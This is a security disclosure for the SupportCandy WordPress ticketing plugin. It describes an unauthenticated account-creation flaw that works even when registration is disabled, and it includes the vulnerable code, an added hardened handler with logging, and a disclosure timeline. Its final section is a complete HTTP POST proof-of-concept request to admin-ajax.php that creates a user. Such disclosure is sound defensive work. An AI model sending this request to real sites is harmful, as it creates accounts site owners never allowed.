Vulnerable Versions: All versions before May 2020
SupportCandy is a WordPress plugin that gives a WordPress site a helpdesk and support ticketing system. I found a vulnerability that allows anyone to create a WordPress account even if registration is disabled both in WordPress and in SupportCandy.
If registration is disabled and this plugin is activated, anyone can create an account. The new user receives the default role configured in the WordPress general settings. The vulnerability also bypasses registration whitelisting, where only specific email addresses are allowed to register (a Wordfence security feature).
wp_create_user() WordPress Function
wp_create_user() is a WordPress function that allows plugin developers to directly insert users into a WordPress user database.
wp_create_user( string $username, string $password, string $email = '' ): int|WP_Error
Now that you know what wp_create_user() does: SupportCandy uses this function to register new users, and its code does not check whether registration is disabled in WordPress or within the plugin's own settings.
Lines 48-54 of SupportCandy’s includes\admin\tickets\sign_in\submit_user.php:
$response = array();
if ( email_exists( $email ) ) {
    $response['error'] = '1';            // email already registered
} else if ( username_exists( $username ) ) {
    $response['error'] = '2';            // username already taken
} else {
    // No check of users_can_register (or any plugin setting) before this call
    $user_id = wp_create_user( $username, $password, $email );
}
SupportCandy only checked whether the email or username from the HTTP POST request already existed; it did not verify that registration was enabled before inserting the new user into the database.
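A hardened form of the handler, added here as an example and not SupportCandy's own code or fix: it refuses to call wp_create_user() unless the WordPress users_can_register option is on and an assumed plugin-level option (wpsc_allow_registration, a placeholder name not taken from this page) also permits it, and it adds a site-level hook that logs any account created while registration is disabled.

```php
<?php
// Added example, not SupportCandy's code. Hardened submit_user logic:
// refuse to create an account unless registration is actually enabled.

function wpsc_registration_allowed() {
    // WordPress "Anyone can register" (Settings > General) is stored in the
    // 'users_can_register' option; it is '0' when registration is disabled.
    if ( ! get_option( 'users_can_register' ) ) {
        return false;
    }
    // Assumed plugin-level toggle; the real SupportCandy option name is not
    // given on this page, so this name is a placeholder.
    return (bool) get_option( 'wpsc_allow_registration', false );
}

function wpsc_submit_user( $username, $password, $email ) {
    $response = array();
    if ( ! wpsc_registration_allowed() ) {
        // Registration disabled: stop before touching the user table.
        $response['error'] = '3';
        return $response;
    }
    if ( email_exists( $email ) ) {
        $response['error'] = '1';
    } elseif ( username_exists( $username ) ) {
        $response['error'] = '2';
    } else {
        $user_id = wp_create_user( $username, $password, $email );
        if ( is_wp_error( $user_id ) ) {
            $response['error'] = '4';
        } else {
            $response['user_id'] = $user_id;
        }
    }
    return $response;
}

// Defence in depth for site owners (e.g. in a mu-plugin): log any account
// created while registration is off, whichever plugin called wp_create_user().
add_action( 'user_register', function ( $user_id ) {
    if ( ! get_option( 'users_can_register' ) ) {
        $action = isset( $_REQUEST['action'] ) ? sanitize_key( $_REQUEST['action'] ) : 'n/a';
        error_log( sprintf(
            'User %d created while users_can_register is off (ajax action: %s)',
            $user_id,
            $action
        ) );
    }
} );
```

The logged ajax action lets a site owner attribute such an account to the plugin endpoint (wpsc_tickets) described on this page.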
Create a user with an HTTP POST
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybeCmA9uq5965NgRq

------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="firstname"

FirstName-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="lastname"

LastName-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="username"

Username-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="email"

email-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="password"

password-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="confirmpassword"

confirmPassword-changethis
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="action"

wpsc_tickets
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="setting_action"

submit_user
------WebKitFormBoundarybeCmA9uq5965NgRq
Content-Disposition: form-data; name="captcha_code"


------WebKitFormBoundarybeCmA9uq5965NgRq--
Timeline
- April 27, 2020 – Disclosed to SupportCandy
- April 28, 2020 – SupportCandy acknowledged the issue and mentioned it would be fixed in their next release.